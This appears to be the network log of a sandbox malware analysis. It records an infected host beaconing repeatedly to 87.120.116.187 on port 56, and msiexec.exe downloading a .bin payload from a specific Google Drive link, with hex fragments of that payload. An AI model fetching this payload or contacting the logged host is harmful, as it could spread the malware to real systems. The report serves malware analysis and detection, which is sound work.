                                                                              Jan 10, 2025 23:53:08.569622993 CET4970456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:08.570146084 CET4970456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:08.574907064 CET564970487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:10.220890045 CET564970487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:10.220987082 CET4970456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:10.221029997 CET4970456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:10.226058960 CET564970487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:10.469237089 CET4970556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:10.474251032 CET564970587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:10.477569103 CET4970556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:10.477822065 CET4970556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:10.483758926 CET564970587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:12.091152906 CET564970587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:12.091211081 CET4970556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:12.091238976 CET4970556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:12.095979929 CET564970587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:12.332556009 CET4970656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:12.337713003 CET564970687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:12.338728905 CET4970656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:12.342371941 CET4970656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:12.347229958 CET564970687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:13.965405941 CET564970687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:13.967520952 CET4970656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:13.967560053 CET4970656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:13.972393990 CET564970687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:14.203470945 CET4970756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:14.349767923 CET564970787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:14.349950075 CET4970756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:14.350297928 CET4970756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:14.355078936 CET564970787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:16.020500898 CET564970787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:16.022416115 CET4970756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:16.022505045 CET4970756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:16.027394056 CET564970787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:16.250385046 CET4970856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:16.255743027 CET564970887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:16.256607056 CET4970856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:16.256961107 CET4970856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:16.262392044 CET564970887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:17.852494955 CET564970887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:17.853557110 CET4970856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:17.853600979 CET4970856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:17.858570099 CET564970887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:18.078428030 CET4970956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:18.083266973 CET564970987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:18.083360910 CET4970956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:18.083610058 CET4970956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:18.088421106 CET564970987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:19.695979118 CET564970987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:19.696122885 CET4970956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:19.698661089 CET4970956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:19.705446959 CET564970987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:19.948987961 CET4971056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:19.954036951 CET564971087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:19.955127954 CET4971056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:19.955480099 CET4971056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:19.960330963 CET564971087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:21.577198029 CET564971087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:21.577275038 CET4971056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:21.577275991 CET4971056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:21.582192898 CET564971087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:21.781522036 CET4971156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:21.786349058 CET564971187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:21.786535978 CET4971156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:21.786758900 CET4971156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:21.791543007 CET564971187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:23.402784109 CET564971187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:23.403017044 CET4971156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:23.403017044 CET4971156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:23.407850981 CET564971187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:23.594134092 CET4971256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:23.598994017 CET564971287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:23.599081993 CET4971256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:23.599330902 CET4971256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:23.604334116 CET564971287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:25.231039047 CET564971287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:25.231148005 CET4971256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:25.231168985 CET4971256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:25.235920906 CET564971287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:25.422339916 CET4971356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:25.427958965 CET564971387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:25.428076029 CET4971356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:25.428308964 CET4971356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:25.433897018 CET564971387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:27.108119965 CET564971387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:27.109565020 CET4971356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.109733105 CET4971356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.114537001 CET564971387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:27.297283888 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.302124023 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:27.307630062 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.307804108 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.312583923 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:28.919332981 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:28.921557903 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:28.921595097 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:28.926913977 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:29.094201088 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:29.099025011 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:29.101627111 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:29.102021933 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:29.106761932 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.697897911 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.697957039 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.697982073 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.703990936 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.875335932 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.880856991 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.883569002 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.883954048 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.888704062 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.533911943 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.534008980 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.534051895 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.538842916 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.703669071 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.708528042 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.708663940 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.708950996 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.713723898 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.359749079 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.359812021 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.359847069 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.364651918 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.531616926 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.537404060 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.537631989 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.537849903 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.542619944 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.153100967 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.153697968 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.153697968 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.158524036 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.312858105 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.317739010 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.317822933 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.318058968 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.322804928 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:37.935077906 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:37.935324907 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:37.935410023 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:37.940203905 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:38.094265938 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:38.099184036 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:38.099270105 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:38.099500895 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:38.104248047 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.732326031 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.732404947 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.732450008 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.737417936 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.875421047 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.880265951 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.881705999 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.881943941 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.887181044 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.518073082 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.518138885 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.518235922 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.524339914 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.656924009 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.661844969 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.661923885 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.662152052 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.666949987 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.281627893 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.281749964 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.305027962 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.309879065 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.438154936 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.442969084 CET564972387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.443042994 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.443308115 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.448067904 CET564972387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:45.078288078 CET564972387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:45.079603910 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:46.459602118 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:46.464476109 CET564972387.120.116.187192.168.2.5
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 23:49:58.116555929 CET53496601.1.1.1192.168.2.5
                                                                              Jan 10, 2025 23:50:05.318648100 CET5120953192.168.2.51.1.1.1
                                                                              Jan 10, 2025 23:50:05.325617075 CET53512091.1.1.1192.168.2.5
                                                                              Jan 10, 2025 23:50:06.438323975 CET5861353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 23:50:06.445194960 CET53586131.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 23:50:05.318648100 CET192.168.2.51.1.1.10xe044Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 23:50:06.438323975 CET192.168.2.51.1.1.10x44a9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 23:50:05.325617075 CET1.1.1.1192.168.2.50xe044No error (0)drive.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 23:50:06.445194960 CET1.1.1.1192.168.2.50x44a9No error (0)drive.usercontent.google.com172.217.16.129A (IP address)IN (0x0001)false
                                                                              • drive.google.com
                                                                              • drive.usercontent.google.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549396142.250.185.784437060C:\Windows\SysWOW64\msiexec.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 22:50:06 UTC216OUTGET /uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2025-01-10 22:50:06 UTC1920INHTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Fri, 10 Jan 2025 22:50:06 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Content-Security-Policy: script-src 'nonce-R8Ab9EA3Q3NIIi87_bR3iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549406172.217.16.1294437060C:\Windows\SysWOW64\msiexec.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 22:50:07 UTC258OUTGET /download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Cache-Control: no-cache
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
                                                                              2025-01-10 22:50:09 UTC4952INHTTP/1.1 200 OK
                                                                              X-GUploader-UploadID: AFiumC53g___cX8jRoXdcx2-6LSCv7qq6PCPqKQCNPiK7YALz_qSqUrNf-uu8vLFKm01Om6zeMEUlXA
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="pCjegmTaGhnStrJWAjBpQ176.bin"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 492608
                                                                              Last-Modified: Mon, 09 Dec 2024 12:22:02 GMT
                                                                              Date: Fri, 10 Jan 2025 22:50:09 GMT
                                                                              Expires: Fri, 10 Jan 2025 22:50:09 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=pvtmwg==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2025-01-10 22:50:09 UTC4952INData Raw: cf e2 c3 6c 30 ea ff 36 a3 b5 35 ad fc 71 94 8d 34 46 59 16 d0 55 26 24 9a e1 4d 97 e4 51 c5 ee af a6 75 07 2c fd a4 55 7a dc 1c 18 e0 be 2e e0 59 75 88 a8 7b 79 f5 db d2 58 ed ef 8e e2 b4 61 6a 21 b2 0a 37 95 63 71 74 de b8 f2 62 16 60 c3 9f 4c 8a 72 21 32 08 f2 16 04 35 f3 a7 eb 12 0a cc 64 c1 0a b6 ee 18 d3 80 ea b7 25 7f 02 4e cd c6 93 70 54 7d 67 a5 66 fc aa 80 02 55 94 33 3f 0b bd e9 06 1f d1 51 1f 5e db 85 83 40 e6 3b 13 c3 98 9c c2 59 cf cf dc e5 e5 30 96 e0 57 b3 10 8f 1a 3b c2 8f c4 13 3d 21 b8 c6 02 99 51 bb bf 31 51 62 18 a9 c8 80 71 70 4c 98 df 7d 9f 25 b5 2e c4 02 53 45 f8 8b fb fe 83 7c 2c 1b 46 0c 68 26 58 37 59 51 d1 d9 11 3a 60 21 85 69 c1 df 4b fd ed 83 8d 54 9f 1b b1 02 15 64 0f f0 dd f4 bc fa d0 6c c6 8f 4e 4a b1 2b 4a 19 b7 d0 4b 59
                                                                              Data Ascii: l065q4FYU&$MQu,Uz.Yu{yXaj!7cqtb`Lr!25d%NpT}gfU3?Q^@;Y0W;=!Q1QbqpL}%.SE|,Fh&X7YQ:`!iKTdlNJ+JKY
                                                                              2025-01-10 22:50:09 UTC4791INData Raw: b8 be 06 36 46 a9 7b a7 42 f6 55 8b 37 fc d5 fc fd 65 6f 4e 9d 47 7d 5a 4f 4b e1 3b fb 2c 65 f4 14 89 88 7f 0d c3 22 88 d7 e3 fa 73 50 81 ce c2 08 21 ad 01 7b 3b db 93 da df 71 dc 32 d3 0f 74 c5 35 fc be d0 f6 c8 66 dc 5d 3b 6d 08 d9 ad 07 d4 ed 20 05 65 08 99 ab 65 f7 91 aa 35 c9 9f c8 30 ba 19 d1 b6 82 ed d0 4b 19 ba 95 bf 0d d3 a2 0b d4 7a a1 30 84 cc d7 00 dc 16 e0 f4 c4 6c 81 6a a7 cc fa de 51 8e 35 5d 64 a2 4e 87 d1 31 f3 ec 2d 16 be 0f d4 73 8d b1 75 58 6d d4 69 61 78 b9 f0 6b 26 65 0b 66 e8 e0 f7 08 c6 f8 50 79 ee 37 b9 27 39 5a 5b 6a 31 91 5e fa a2 7c 1f 48 f2 ec 5a 82 5b 26 92 88 9e 1b ad d4 3c 8e c9 6b 8f aa a7 e7 52 44 d9 3a f1 16 b9 68 0b 27 7b a1 ca 30 56 8a 99 70 de b8 9a 51 bb 26 c3 cf 45 ae 71 21 fe 5b a5 dd fd dd 14 58 14 ed 81 14 e7 fa
                                                                              Data Ascii: 6F{BU7eoNG}ZOK;,e"sP!{;q2t5f];m ee50Kz0ljQ5]dN1-suXmiaxk&efPy7'9Z[j1^|HZ[&<kRD:h'{0VpQ&Eq![X
                                                                              2025-01-10 22:50:09 UTC1325INData Raw: bc cc 26 23 c3 0d 6f 50 0c 26 36 55 c8 bb 92 42 21 4d d8 9d 33 84 64 8e f3 b7 e0 70 2b da 32 51 b5 28 69 28 6a 8f 90 65 3a f2 3c 6f 01 33 4d 28 8c 38 f4 cb ae c0 72 1f 12 16 45 50 f7 91 f6 53 28 72 45 24 69 96 24 29 eb f9 4d 55 4e 61 be 79 d2 ef 51 44 42 71 f5 b6 40 78 5c 10 b4 20 7e db 8e 17 93 32 5d b2 8e ab 12 32 82 1e 96 d8 1a 90 5c e0 a3 e2 49 ef 55 8d 9e 97 c2 90 2c 9b f7 0b dd 70 10 26 4d d2 c9 bc 26 20 65 eb da ac ce 54 ba 94 bd 69 95 ad f3 35 b4 01 2a b2 b2 13 ac 8a 1b 8e 2a ef bd 6c 5b ec 23 f8 67 f1 15 c8 b0 27 97 17 ab 90 61 52 c6 e6 9d db da 56 bf 47 22 82 aa 06 93 aa 18 a2 c2 12 a7 78 77 8a ba a4 44 1f 97 10 03 18 95 8c 5f 6a e4 a2 c5 2a 96 4c ec 02 1a 20 2d 25 a1 18 79 e9 6e 02 15 56 7f b1 86 2e 53 9a bf 64 fb 2f 99 bb b3 e0 da e2 ec ec 17
                                                                              Data Ascii: &#oP&6UB!M3dp+2Q(i(je:<o3M(8rEPS(rE$i$)MUNayQDBq@x\ ~2]2\IU,p&M& eTi5**l[#g'aRVG"xwD_j*L -%ynV.Sd/
                                                                              2025-01-10 22:50:09 UTC1390INData Raw: 16 bb 1a b9 29 0a c2 06 8d c2 97 52 7e 14 33 8d 8a eb 8a 3e b3 c3 ac 91 93 0a 85 fd 97 cd 1e ba a4 6b 12 98 66 8d 7d 21 9b a7 3f 75 41 1c d1 d5 f6 18 84 fc 86 c7 d3 6f 36 fe cd 02 1d 03 bd 2b 0c fc 3c 54 45 8f 70 8d 89 66 38 4b 5b 9e 83 70 64 90 9e fd 82 d2 40 ce de 94 2c cf c2 b3 c0 5f 09 7a 0b 54 66 26 e2 9a 78 de 7e d2 ef 48 91 62 e4 01 d9 47 d8 00 9c 33 8c 20 fa be 9d c8 3a 66 90 00 c4 57 be 45 6b 57 72 64 09 6d c6 14 f1 0d 58 0b 20 23 3f 51 ff 81 63 b4 98 20 18 99 90 9c 92 71 23 4e c3 8c f7 92 e0 0f 1e d1 6f 97 a5 cb 91 bb 3c ac d5 3c a5 69 84 bb ac a9 1c af b3 31 78 90 3d f1 c9 ea 30 53 61 e5 51 a1 73 7a 58 1d a1 f3 b9 0a e3 06 b8 83 92 3b 3b 12 1e 81 4c 00 18 37 cb 13 42 9a 24 0c 81 f1 df 73 37 6d 35 97 29 11 ef 39 a3 d7 e9 8a 6d ec 28 9c 16 a2 23
                                                                              Data Ascii: )R~3>kf}!?uAo6+<TEpf8K[pd@,_zTf&x~HbG3 :fWEkWrdmX #?Qc q#No<<i1x=0SaQszX;;L7B$s7m5)9m(#
